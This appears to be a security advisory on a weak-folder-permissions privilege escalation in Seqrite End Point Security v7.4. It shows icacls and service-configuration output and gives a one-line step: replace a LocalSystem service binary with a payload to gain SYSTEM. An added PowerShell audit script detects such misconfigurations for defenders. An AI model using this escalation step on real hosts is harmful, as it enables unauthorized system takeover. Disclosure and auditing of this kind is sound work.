# Exploit Title : Seqrite End Point Security v7.4 - Weak Folder Permissions Privilege Escalation
# Date : 09/13/2018
# Exploit Author : Hashim Jawad - @ihack4falafel
# Vendor Homepage : https://www.seqrite.com/
# Tested on : Windows 7 Enterprise SP1 (x64)

Description:
============
Seqrite End Point Security v7.4 installs by default to "C:\Program Files\Seqrite\Seqrite" with very weak folder permissions, granting any user full control ("Everyone: (F)") over the contents of the directory and its subfolders. In addition, the program installs a handful of services whose binaries live inside the program folder and run as "LocalSystem". Once the "Self Protection" feature (on by default) is disabled, which can be done in a number of ways (for instance, if the policy does not require the EPS client password to change settings, any user can turn the feature off), a non-privileged user is able to elevate privileges to "NT AUTHORITY\SYSTEM".

Proof:
======
c:\>icacls "c:\Program Files\Seqrite\Seqrite"
c:\Program Files\Seqrite\Seqrite Everyone:(OI)(IO)(F)
Everyone:(CI)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)

Successfully processed 1 files; Failed processing 0 files

c:\>sc qc "Core Mail Protection"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Core Mail Protection
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Core Mail Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

c:\>icacls "C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE"
C:\Program Files\Seqrite\Seqrite\EMLPROXY.EXE Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

c:\>

Exploit:
========
Simply replace "EMLPROXY.EXE" with your preferred payload and wait for execution upon reboot.
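
The following audit script is an added example, not part of the original advisory or of any Seqrite tooling; it finds the class of misconfiguration shown above (a LocalSystem service whose binary or parent folder is writable by Everyone/Users) on a host so it can be fixed before anyone abuses it. Function names, the principal list and the rights mask are my own choices.

```powershell
# Added example: audit services running as LocalSystem whose binary, or the folder
# holding it, grants write-capable rights to principals every local user belongs to.
# Assumed: function/variable names are hypothetical, not from the advisory or vendor.

# Principals that any local account is a member of.
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a caller replace or tamper with a file/folder:
# Write (0x116), Delete (0x10000), ChangePermissions (0x40000),
# TakeOwnership (0x80000), GENERIC_ALL (0x10000000), GENERIC_WRITE (0x40000000).
$WriteMask = 0x116 -bor 0x10000 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # "C:\Program Files\X\y.exe" args  -> quoted path
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    # C:\Program Files\X\y.exe args    -> unquoted path, stop at the .exe
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Get-WeakAces {
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($LowPrivPrincipals -contains $_.IdentityReference.Value) -and
        (($_.FileSystemRights.value__ -band $WriteMask) -ne 0)
    }
}

Get-CimInstance Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
    ForEach-Object {
        $svc = $_
        $exe = Get-ServiceBinaryPath $svc.PathName
        if (-not (Test-Path -LiteralPath $exe)) { return }
        # Check both the binary and its folder: the Seqrite case has (F) for
        # Everyone on the folder and the inherited (I)(F) on EMLPROXY.EXE.
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            foreach ($ace in (Get-WeakAces $target)) {
                [pscustomobject]@{ Service = $svc.Name; Target = $target
                                   Principal = $ace.IdentityReference.Value
                                   Rights = $ace.FileSystemRights }
            }
        }
    } | Format-Table -AutoSize
```

Every row it prints is a SYSTEM service binary that a standard user could overwrite; the remediation is to remove the write-capable ACE (here the Everyone:(F) entries on the program folder) or apply a vendor build that installs with sane permissions.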

# Disclosure Timeline:
# ====================
# 09-14-18: Contacted vendor, no response
# 09-21-18: Contacted vendor, no response
# 09-28-18: Vulnerability published